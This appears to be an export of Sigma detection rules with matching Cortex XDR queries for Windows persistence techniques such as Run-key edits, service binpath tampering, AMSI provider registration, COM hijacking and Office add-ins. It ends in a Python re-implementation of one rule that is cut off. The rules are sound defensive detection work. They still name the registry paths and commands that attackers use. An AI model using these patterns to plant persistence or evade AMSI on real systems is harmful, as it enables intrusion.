Sigma YAML
title: Potential Persistence Attempt Via Existing Service Tampering
id: 38879043-7e1e-47a9-8d46-6bec88e201df
status: test
description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.
references:
    - https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/
author: Sreeman
date: 2020-09-29
modified: 2023-02-04
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1543.003
    - attack.t1574.011
logsource:
    category: process_creation
    product: windows
detection:
    selection_sc:
        - CommandLine|contains|all:
              - 'sc '
              - 'config '
              - 'binpath='
        - CommandLine|contains|all:
              - 'sc '
              - 'failure'
              - 'command='
    selection_reg_img:
        - CommandLine|contains|all:
              - 'reg '
              - 'add '
              - 'FailureCommand'
        - CommandLine|contains|all:
              - 'reg '
              - 'add '
              - 'ImagePath'
    selection_reg_ext:
        CommandLine|contains:
            - '.sh'
            - '.exe'
            - '.dll'
            - '.bin$'
            - '.bat'
            - '.cmd'
            - '.js'
            - '.msh$'
            - '.reg$'
            - '.scr'
            - '.ps'
            - '.vb'
            - '.jar'
            - '.pl'
    condition: selection_sc or all of selection_reg_*
falsepositives:
    - Unknown
level: medium
level: medium · quality: Strong · alert volume: High FP
Potential Persistence Attempt Via Run Keys Using Reg.EXE
Detects a suspicious reg.exe command line adding a value to a Run key in the Registry.
status: test · author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) · ATT&CK mapping: sub-technique · id: de587dce-915e-4218-aac4-835ca6af6f70
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_process_image_path contains "\reg.exe" and 
 (action_process_image_command_line contains "reg" and 
 action_process_image_command_line contains " add ") and 
 (action_process_image_command_line in ("*Software\Microsoft\Windows\CurrentVersion\Run*", "*\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run*", "*\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run*"))))
Sigma YAML
title: Potential Persistence Attempt Via Run Keys Using Reg.EXE
id: de587dce-915e-4218-aac4-835ca6af6f70
status: test
description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry
references:
    - https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/
    - https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2021-06-28
modified: 2025-02-17
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1547.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\reg.exe'
        CommandLine|contains|all:
            - 'reg'
            - ' add '
        CommandLine|contains:
            - 'Software\Microsoft\Windows\CurrentVersion\Run'
            - '\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
            - '\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run'
    condition: selection
falsepositives:
    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.
    - Legitimate administrator sets up autorun keys for legitimate reasons.
    - Discord
level: medium
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml
level: medium · quality: Moderate · alert volume: Medium FP
Potential Persistence Using DebugPath
Detects potential persistence using the Appx DebugPath registry value.
status: test · author: frack113 · ATT&CK mapping: sub-technique · id: df4dc653-1029-47ba-8231-3c44238cc0ae
cortex_xdr query
config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_registry_key_name contains "Classes\ActivatableClasses\Package\Microsoft." and 
 action_registry_key_name contains "\DebugPath") or 
 (action_registry_key_name contains "\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft." and 
 action_registry_key_name contains "\(Default)")))
Sigma YAML
title: Potential Persistence Using DebugPath
id: df4dc653-1029-47ba-8231-3c44238cc0ae
status: test
description: Detects potential persistence using Appx DebugPath
references:
    - https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/
    - https://github.com/rootm0s/WinPwnage
author: frack113
date: 2022-07-27
modified: 2023-08-17
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546.015
logsource:
    category: registry_set
    product: windows
detection:
    selection_debug:
        TargetObject|contains: 'Classes\ActivatableClasses\Package\Microsoft.'
        TargetObject|endswith: '\DebugPath'
    selection_default:
        TargetObject|contains: '\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.'
        TargetObject|endswith: '\(Default)'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: medium
level: medium · quality: Moderate · alert volume: Medium FP
Potential Persistence Via AppCompat RegisterAppRestart Layer
Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API, which can potentially be abused as a persistence mechanism.
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: sub-technique · id: b86852fb-4c77-48f9-8519-eb1b2c308b59
cortex_xdr query
config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_registry_key_name contains "\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\" and 
 (action_registry_value_name contains "REGISTERAPPRESTART" or 
 action_registry_data contains "REGISTERAPPRESTART")))
Sigma YAML
title: Potential Persistence Via AppCompat RegisterAppRestart Layer
id: b86852fb-4c77-48f9-8519-eb1b2c308b59
status: test
description: |
    Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.
    This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API.
    This can be potentially abused as a persistence mechanism.
references:
    - https://github.com/nasbench/Misc-Research/blob/d114d6a5e0a437d3818e492ef9864367152543e7/Other/Persistence-Via-RegisterAppRestart-Shim.md
author: Nasreddine Bencherchali (Nextron Systems)
date: 2024-01-01
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546.011
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\'
        Details|contains: 'REGISTERAPPRESTART'
    condition: selection
falsepositives:
    - Legitimate applications making use of this feature for compatibility reasons
level: medium
level: medium · quality: Strong · alert volume: Medium FP
Potential Persistence Via Custom Protocol Handler
Detects potential persistence activity via the registration of a new custom protocol handler. While legitimate applications often register protocol handlers during installation, an attacker can abuse this by setting a custom handler to be used as a persistence mechanism.
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: technique · id: fdbf0b9d-0182-4c43-893b-a1eaab92d085
cortex_xdr query
config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_registry_key_name contains "HKCR\" and 
 (action_registry_value_name contains "URL:" or 
 action_registry_data contains "URL:")) and 
 (not 
 ((action_registry_value_name contains "URL:ms-" or 
 action_registry_data contains "URL:ms-") or 
 (actor_process_image_path in ("C:\Program Files (x86)*", "C:\Program Files\*", "C:\Windows\System32\*", "C:\Windows\SysWOW64\*"))))))
Sigma YAML
title: Potential Persistence Via Custom Protocol Handler
id: fdbf0b9d-0182-4c43-893b-a1eaab92d085
status: test
description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.
references:
    - https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-05-30
modified: 2023-05-12
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|startswith: 'HKCR\'
        Details|startswith: 'URL:'
    filter_main_ms_trusted:
        Details|startswith: 'URL:ms-' # Microsoft Protocols usually start with "ms-"
    filter_main_generic_locations:
        Image|startswith: # Add more folders to avoid FP
            - 'C:\Program Files (x86)'
            - 'C:\Program Files\'
            - 'C:\Windows\System32\'
            - 'C:\Windows\SysWOW64\'
    # Uncomment This section to add specific Protocol Handler names that are know
    # filter_specific:
    #     Details: 'URL:'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment.
level: medium
level: medium · quality: Strong · alert volume: Medium FP
Potential Persistence Via Event Viewer Events.asp
Detects a potential registry persistence attempt using the Event Viewer "Events.asp" technique.
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: technique · id: a1e11042-a74a-46e6-b07c-c4ce8ecc239b
cortex_xdr query
config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_registry_key_name in ("*\Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgram*", "*\Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionURL*")) and 
 (not 
 ((actor_process_image_path contains "C:\WINDOWS\system32\svchost.exe" and 
 action_registry_key_name contains "\Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgram" and 
 (action_registry_value_name = "%%SystemRoot%%\PCHealth\HelpCtr\Binaries\HelpCtr.exe" or 
 action_registry_data = "%%SystemRoot%%\PCHealth\HelpCtr\Binaries\HelpCtr.exe")) or 
 (actor_process_image_path contains "C:\WINDOWS\system32\svchost.exe" and 
 action_registry_key_name contains "\Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgramCommandLineParameters" and 
 (action_registry_value_name = "-url hcp://services/centers/support?topic=%%s" or 
 action_registry_data = "-url hcp://services/centers/support?topic=%%s")) or 
 (action_registry_value_name = "http://go.microsoft.com/fwlink/events.asp" or 
 action_registry_data = "http://go.microsoft.com/fwlink/events.asp") or 
 (action_registry_value_name = "(Empty)" or 
 action_registry_data = "(Empty)")))))
Sigma YAML
title: Potential Persistence Via Event Viewer Events.asp
id: a1e11042-a74a-46e6-b07c-c4ce8ecc239b
status: test
description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique
references:
    - https://twitter.com/nas_bench/status/1626648985824788480
    - https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks
    - https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/
    - https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-02-17
modified: 2023-03-05
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        # Covers both "\Policies\" and "\Software\" paths for both "Machine" and "User" level configs
        # Also "MicrosoftRedirectionProgramCommandLineParameters" key
        TargetObject|contains:
            - '\Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgram'
            - '\Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionURL'
    filter_default_redirect_program:
        Image|endswith: 'C:\WINDOWS\system32\svchost.exe' # Set via GPO
        TargetObject|endswith: '\Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgram'
        Details: '%%SystemRoot%%\PCHealth\HelpCtr\Binaries\HelpCtr.exe'
    filter_default_redirect_program_cli:
        Image|endswith: 'C:\WINDOWS\system32\svchost.exe' # Set via GPO
        TargetObject|endswith: '\Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgramCommandLineParameters'
        Details: '-url hcp://services/centers/support?topic=%%s'
    filter_url:
        Details: 'http://go.microsoft.com/fwlink/events.asp'
    filter_cleaner:
        Details: '(Empty)'
    condition: selection and not 1 of filter_*
falsepositives:
    - Unknown
level: medium
level: medium · quality: Moderate · alert volume: High FP
Potential Persistence Via Logon Scripts - Registry
Detects creation of the "UserInitMprLogonScript" registry value, which can be used as a persistence method by malicious actors.
status: test · author: Tom Ueltschi (@c_APT_ure) · ATT&CK mapping: sub-technique · id: 9ace0707-b560-49b8-b6ca-5148b42f39fb
cortex_xdr query
config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 action_registry_key_name contains "UserInitMprLogonScript")
Sigma YAML
title: Potential Persistence Via Logon Scripts - Registry
id: 9ace0707-b560-49b8-b6ca-5148b42f39fb
status: test
description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md
author: Tom Ueltschi (@c_APT_ure)
date: 2019-01-12
modified: 2025-10-26
tags:
    - attack.privilege-escalation
    - attack.t1037.001
    - attack.persistence
    - attack.lateral-movement
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: 'UserInitMprLogonScript'
    condition: selection
falsepositives:
    - Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate
level: medium
regression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/info.yml
simulation:
    - type: atomic-red-team
      name: Logon Scripts
      technique: T1037.001
      atomic_guid: d6042746-07d4-4c92-9ad8-e644c114a231
level: medium · quality: Strong · alert volume: Medium FP
Potential Persistence Via Netsh Helper DLL - Registry
Detects changes to the Netsh registry key that add a new DLL value. This change might indicate a persistence attempt by adding a malicious Netsh helper.
status: test · author: Anish Bogati · ATT&CK mapping: sub-technique · id: c90362e0-2df3-4e61-94fe-b37615814cb1
cortex_xdr query
config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_registry_key_name contains "\SOFTWARE\Microsoft\NetSh" and 
 (action_registry_value_name contains ".dll" or 
 action_registry_data contains ".dll")) and 
 (not 
 (actor_process_image_path = "C:\Windows\System32\poqexec.exe" and 
 ((action_registry_value_name in ("ipmontr.dll", "iasmontr.dll", "ippromon.dll")) or 
 (action_registry_data in ("ipmontr.dll", "iasmontr.dll", "ippromon.dll")))))))
Sigma YAML
title: Potential Persistence Via Netsh Helper DLL - Registry
id: c90362e0-2df3-4e61-94fe-b37615814cb1
related:
    - id: 56321594-9087-49d9-bf10-524fe8479452
      type: similar
    - id: e7b18879-676e-4a0e-ae18-27039185a8e7
      type: similar
status: test
description: |
    Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
references:
    - https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll
    - https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/
author: Anish Bogati
date: 2023-11-28
modified: 2025-10-08
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546.007
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\SOFTWARE\Microsoft\NetSh'
        Details|contains: '.dll'
    filter_main_poqexec:
        Image: 'C:\Windows\System32\poqexec.exe'
        Details:
            - 'ipmontr.dll'
            - 'iasmontr.dll'
            - 'ippromon.dll'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Legitimate helper added by different programs and the OS
level: medium
level: medium · quality: Strong · alert volume: Medium FP
Potential Persistence Via New AMSI Providers - Registry
Detects when an attacker adds a new AMSI provider via the Windows Registry to bypass AMSI (Antimalware Scan Interface) protections. Attackers may add custom AMSI providers to persist on the system and evade detection by security software that relies on AMSI for scanning scripts and other content. This technique is often used in conjunction with fileless malware and script-based attacks to maintain persistence while avoiding detection.
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: tactic-only · id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705
cortex_xdr query
config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_registry_key_name in ("*\SOFTWARE\Microsoft\AMSI\Providers\*", "*\SOFTWARE\WOW6432Node\Microsoft\AMSI\Providers\*")) and 
 (not 
 (((actor_process_image_path in ("C:\Program Files\Avast Software\Avast\RegSvr.exe", "C:\Program Files\Avast Software\Avast\x86\RegSvr.exe")) and 
 action_registry_key_name contains "\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}") or 
 ((actor_process_image_path in ("C:\Program Files\AVG\Antivirus\RegSvr.exe", "C:\Program Files\AVG\Antivirus\x86\RegSvr.exe")) and 
 action_registry_key_name contains "\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}") or 
 (actor_process_image_path = "C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe" and 
 action_registry_key_name contains "\{00000001-3DCC-4B48-A82E-E2071FE58E05}")))))
Sigma YAML
title: Potential Persistence Via New AMSI Providers - Registry
id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705
status: test
description: |
    Detects when an attacker adds a new AMSI provider via the Windows Registry to bypass AMSI (Antimalware Scan Interface) protections.
    Attackers may add custom AMSI providers to persist on the system and evade detection by security software that relies on AMSI for scanning scripts and other content.
    This technique is often used in conjunction with fileless malware and script-based attacks to maintain persistence while avoiding detection.
references:
    - https://persistence-info.github.io/Data/amsi.html
    - https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-21
modified: 2025-10-26
tags:
    - attack.persistence
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains:
            - '\SOFTWARE\Microsoft\AMSI\Providers\'
            - '\SOFTWARE\WOW6432Node\Microsoft\AMSI\Providers\'
    filter_optional_avast:
        Image:
            - 'C:\Program Files\Avast Software\Avast\RegSvr.exe'
            - 'C:\Program Files\Avast Software\Avast\x86\RegSvr.exe'
        TargetObject|contains: '\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}'
    filter_optional_avg:
        Image:
            - 'C:\Program Files\AVG\Antivirus\RegSvr.exe'
            - 'C:\Program Files\AVG\Antivirus\x86\RegSvr.exe'
        TargetObject|contains: '\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}'
    filter_optional_avira:
        Image: 'C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe'
        TargetObject|contains: '\{00000001-3DCC-4B48-A82E-E2071FE58E05}'
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Legitimate security products adding their own AMSI providers. Filter these according to your environment.
level: medium
regression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers/info.yml
level: medium · quality: Strong · alert volume: Medium FP
Potential Persistence Via Notepad++ Plugins
Detects creation of new ".dll" files inside the plugins directory of a Notepad++ installation by a process other than "gup.exe", which could indicate possible persistence.
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: tactic-only · id: 54127bd4-f541-4ac3-afdb-ea073f63f692
cortex_xdr query
config case_sensitive = false | preset=xdr_file | filter event_type = ENUM.FILE and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_file_name contains "\Notepad++\plugins\" and 
 action_file_name contains ".dll") and 
 (not 
 (actor_process_image_path contains "\Notepad++\updater\gup.exe" or 
 (actor_process_image_path contains "C:\Users\" and 
 actor_process_image_path contains "\AppData\Local\Temp\" and 
 (actor_process_image_path in ("*\target.exe", "*Installer.x64.exe"))) or 
 (actor_process_image_path contains "\npp." and 
 actor_process_image_path contains ".exe" and 
 (action_file_name in ("C:\Program Files\Notepad++\plugins\NppExport\NppExport.dll", "C:\Program Files\Notepad++\plugins\mimeTools\mimeTools.dll", "C:\Program Files\Notepad++\plugins\NppConverter\NppConverter.dll", "C:\Program Files\Notepad++\plugins\Config\nppPluginList.dll")))))))
Sigma YAML
title: Potential Persistence Via Notepad++ Plugins
id: 54127bd4-f541-4ac3-afdb-ea073f63f692
status: test
description: Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence
references:
    - https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-10
modified: 2025-09-01
tags:
    - attack.persistence
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|contains: '\Notepad++\plugins\'
        TargetFilename|endswith: '.dll'
    filter_gup:
        Image|endswith: '\Notepad++\updater\gup.exe'
    filter_install:
        # This filter is for Sigma dataset you could remove it or change when using the rule in your own env
        Image|startswith: 'C:\Users\'
        Image|contains: '\AppData\Local\Temp\'
        Image|endswith:
            - '\target.exe'
            - 'Installer.x64.exe'
    filter_main_installer:
        Image|contains: '\npp.'
        Image|endswith: '.exe'
        TargetFilename:
            - 'C:\Program Files\Notepad++\plugins\NppExport\NppExport.dll'
            - 'C:\Program Files\Notepad++\plugins\mimeTools\mimeTools.dll'
            - 'C:\Program Files\Notepad++\plugins\NppConverter\NppConverter.dll'
            - 'C:\Program Files\Notepad++\plugins\Config\nppPluginList.dll'
    condition: selection and not 1 of filter_*
falsepositives:
    - Possible FPs during first installation of Notepad++
    - Legitimate use of custom plugins by users in order to enhance notepad++ functionalities
level: medium
level: medium · quality: Moderate · alert volume: Medium FP
Potential Persistence Via Scrobj.dll COM Hijacking
Detects use of scrobj.dll as a COM InprocServer32 handler, as this DLL looks for the ScriptletURL key to get the location of the script to execute.
status: test · author: frack113 · ATT&CK mapping: sub-technique · id: fe20dda1-6f37-4379-bbe0-a98d400cae90
cortex_xdr query
config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_registry_key_name contains "InprocServer32\(Default)" and 
 (action_registry_value_name = "C:\WINDOWS\system32\scrobj.dll" or 
 action_registry_data = "C:\WINDOWS\system32\scrobj.dll")))
Sigma YAML
title: Potential Persistence Via Scrobj.dll COM Hijacking
id: fe20dda1-6f37-4379-bbe0-a98d400cae90
status: test
description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md
author: frack113
date: 2022-08-20
modified: 2023-08-17
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546.015
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith: 'InprocServer32\(Default)'
        Details: 'C:\WINDOWS\system32\scrobj.dll'
    condition: selection
falsepositives:
    - Legitimate use of the dll.
level: medium
level: medium · quality: Strong · alert volume: Medium FP
Potential Persistence Via Visual Studio Tools for Office
Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.
status: test · author: Bhabesh Raj · ATT&CK mapping: sub-technique · id: 9d15044a-7cfe-4d23-8085-6ebc11df7685
cortex_xdr query
config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_registry_key_name in ("*\Software\Microsoft\Office\Outlook\Addins\*", "*\Software\Microsoft\Office\Word\Addins\*", "*\Software\Microsoft\Office\Excel\Addins\*", "*\Software\Microsoft\Office\Powerpoint\Addins\*", "*\Software\Microsoft\VSTO\Security\Inclusion\*")) and 
 (not 
 ((actor_process_image_path in ("C:\Windows\System32\msiexec.exe", "C:\Windows\SysWOW64\msiexec.exe", "C:\Windows\System32\regsvr32.exe", "C:\Windows\SysWOW64\regsvr32.exe")) or 
 ((actor_process_image_path in ("C:\Program Files\Common Files (x86)\Microsoft Shared\ClickToRun\*", "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\*")) and 
 actor_process_image_path contains "\OfficeClickToRun.exe") or 
 (actor_process_image_path in ("C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe", "C:\Program Files\Microsoft Office\root\integration\integrator.exe")) or 
 ((actor_process_image_path in ("C:\Program Files\Microsoft Office\OFFICE*", "C:\Program Files (x86)\Microsoft Office\OFFICE*", "C:\Program Files\Microsoft Office\Root\OFFICE*", "C:\Program Files (x86)\Microsoft Office\Root\OFFICE*", "C:\PROGRA~2\MICROS~2\Office*")) and 
 (actor_process_image_path in ("*\excel.exe", "*\Integrator.exe", "*\OneNote.exe", "*\outlook.exe", "*\powerpnt.exe", "*\Teams.exe", "*\visio.exe", "*\winword.exe"))) or 
 ((actor_process_image_path in ("C:\Program Files\Common Files\Microsoft Shared\VSTO\*", "C:\Program Files (x86)\Microsoft Shared\VSTO\*")) and 
 actor_process_image_path contains "\VSTOInstaller.exe"))) and 
 (not 
 (((actor_process_image_path in ("C:\Program Files\AVG\Antivirus\RegSvr.exe", "C:\Program Files (x86)\AVG\Antivirus\RegSvr.exe")) and 
 action_registry_key_name contains "\Microsoft\Office\Outlook\Addins\Antivirus.AsOutExt\") or 
 ((actor_process_image_path in ("C:\Program Files\Avast Software\Avast\RegSvr.exe", "C:\Program Files (x86)\Avast Software\Avast\RegSvr.exe")) and 
 action_registry_key_name contains "\Microsoft\Office\Outlook\Addins\Avast.AsOutExt\")))))
view Sigma YAML
title: Potential Persistence Via Visual Studio Tools for Office
id: 9d15044a-7cfe-4d23-8085-6ebc11df7685
status: test
description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.
references:
    - https://twitter.com/_vivami/status/1347925307643355138
    - https://vanmieghem.io/stealth-outlook-persistence/
author: Bhabesh Raj
date: 2021-01-10
modified: 2026-01-09
tags:
    - attack.t1137.006
    - attack.persistence
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains:
            - '\Software\Microsoft\Office\Outlook\Addins\'
            - '\Software\Microsoft\Office\Word\Addins\'
            - '\Software\Microsoft\Office\Excel\Addins\'
            - '\Software\Microsoft\Office\Powerpoint\Addins\'
            - '\Software\Microsoft\VSTO\Security\Inclusion\'
    filter_main_system:
        Image:
            - 'C:\Windows\System32\msiexec.exe'
            - 'C:\Windows\SysWOW64\msiexec.exe'
            - 'C:\Windows\System32\regsvr32.exe'
            - 'C:\Windows\SysWOW64\regsvr32.exe' # e.g. default Evernote installation
    filter_main_office_click_to_run:
        Image|startswith:
            - 'C:\Program Files\Common Files (x86)\Microsoft Shared\ClickToRun\'
            - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\'
        Image|endswith: '\OfficeClickToRun.exe'
    filter_main_integrator:
        Image:
            - 'C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe'
            - 'C:\Program Files\Microsoft Office\root\integration\integrator.exe'
    filter_main_office_apps:
        Image|startswith:
            - 'C:\Program Files\Microsoft Office\OFFICE'
            - 'C:\Program Files (x86)\Microsoft Office\OFFICE'
            - 'C:\Program Files\Microsoft Office\Root\OFFICE'
            - 'C:\Program Files (x86)\Microsoft Office\Root\OFFICE'
            - 'C:\PROGRA~2\MICROS~2\Office'
        Image|endswith:
            - '\excel.exe'
            - '\Integrator.exe'
            - '\OneNote.exe'
            - '\outlook.exe'
            - '\powerpnt.exe'
            - '\Teams.exe'
            - '\visio.exe'
            - '\winword.exe'
    filter_main_vsto:
        Image|startswith:
            - 'C:\Program Files\Common Files\Microsoft Shared\VSTO\'
            - 'C:\Program Files (x86)\Microsoft Shared\VSTO\'
        Image|endswith: '\VSTOInstaller.exe'
    filter_optional_avg:
        Image:
            - 'C:\Program Files\AVG\Antivirus\RegSvr.exe'
            - 'C:\Program Files (x86)\AVG\Antivirus\RegSvr.exe'
        TargetObject|contains: '\Microsoft\Office\Outlook\Addins\Antivirus.AsOutExt\'
    filter_optional_avast:
        Image:
            - 'C:\Program Files\Avast Software\Avast\RegSvr.exe'
            - 'C:\Program Files (x86)\Avast Software\Avast\RegSvr.exe'
        TargetObject|contains: '\Microsoft\Office\Outlook\Addins\Avast.AsOutExt\'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Legitimate Addin Installation
level: medium
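The filter chain in this rule does most of the work: the add-in key paths in the selection are written by legitimate installers and by Office itself, and the rule only stays quiet because every known-good writer is excluded. The following added example (my code, not the rule's or its author's) re-implements the selection and both filter groups in Python and runs them over constructed Sysmon-style registry_set events; it assumes events carry 'Image' and 'TargetObject' and that matching is case-insensitive, as Sigma specifies. The Python keeps the YAML's startswith/endswith semantics, whereas the rendered Cortex XDR query expresses the endswith checks on OfficeClickToRun.exe and VSTOInstaller.exe as contains.

```python
# Added example (not part of the rule corpus): the VSTO add-in rule as a Python
# predicate, run over constructed Sysmon-style registry_set events.
# Assumption: events are dicts with 'Image' and 'TargetObject'; matching is
# case-insensitive, so every literal is lower-cased once up front.

def _lower(items):
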